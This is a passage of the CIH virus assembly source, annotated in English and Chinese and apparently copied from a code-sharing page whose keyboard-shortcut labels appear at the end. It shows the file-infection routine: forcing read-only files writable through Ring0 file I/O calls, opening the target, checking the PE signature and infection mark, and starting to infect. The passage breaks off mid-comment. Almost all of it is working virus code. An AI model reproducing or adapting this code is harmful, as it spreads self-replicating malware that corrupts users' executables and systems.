📄 cih.asm
字号:
; *************************************
; * Is Read-Only File !? *
; *************************************
test cl, 01h
jz OpenFile ;测试是否是只读文件
; *************************************
; * Modify Read-Only File to Write *
; *************************************
mov ax, 4301h ;IFSMgr_Ring0_FileIO的获得文件属性号(R0_FILEATTRIBUTES/SET_ATTRIBUTES )
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO ;调用IFSMgr_Ring0_FileIO的改文件属性功能,使文件可写
; *************************************
; * Open File *
; *************************************
OpenFile:
xor eax, eax
mov ah, 0d5h ;IFSMgr_Ring0_FileIO的打开文件功能号(R0_OPENCREATFILE or RO_OPENCREAT_IN_CONTEXT)
xor ecx, ecx ;文件属性
xor edx, edx
inc edx
mov ebx, edx
inc ebx ;esi为文件名首址
call edi ; VXDCall IFSMgr_Ring0_FileIO ;调用IFSMgr_Ring0_FileIO的打开文件功能
xchg ebx, eax ; mov ebx, FileHandle ;在ebx中保存文件句柄
; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************
pop ecx
pushf
test cl, 01h
jz IsOpenFileOK ;是否需要恢复文件属性(有写属性就不需要恢复了)
; *************************************
; * Restore Attributes of the File *
; *************************************
mov ax, 4301h ;IFSMgr_Ring0_FileIO的获得文件属性号(R0_FILEATTRIBUTES/SET_ATTRIBUTES)
call edi ; VXDCall IFSMgr_Ring0_FileIO ;恢复文件属性
; *************************************
; * Is Open File OK !? *
; *************************************
IsOpenFileOK:
popf
jc DisableOnBusy ;打开是否成功?
; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************
push esi ; Push FileNameBuffer Address to Stack ;把文件名数据区首址压栈
pushf ; Now CF = 0, Push Flag to Stack ;保存标志位
add esi, DataBuffer-@7 ; mov esi, offset DataBuffer ;esi指向数据区首址
; ***************************
; * Get OffsetToNewHeader *
; ***************************
xor eax, eax
mov ah, 0d6h ;IFSMgr_Ring0_FileIO的读文件功能号(R0_READFILE)
; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
mov ebp, eax
push 00000004h ;读取4个字节
pop ecx
push 0000003ch ;读取dos文件头偏移3ch处的Windows文件头首部偏移
pop edx
call edi ; VXDCall IFSMgr_Ring0_FileIO ;读文件到esi
mov edx, [esi] ;Windows文件头首部偏移放到edx
; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************
dec edx
mov eax, ebp ;功能号
call edi ; VXDCall IFSMgr_Ring0_FileIO ;读文件到esi
; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; ***************************
; cmp [esi], '\0PE\0'
cmp dword ptr [esi], 00455000h ;判断是否是PE文件(标志"PE\0\0")
jne CloseFile ;不是就关闭文件
; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************
; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * ⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -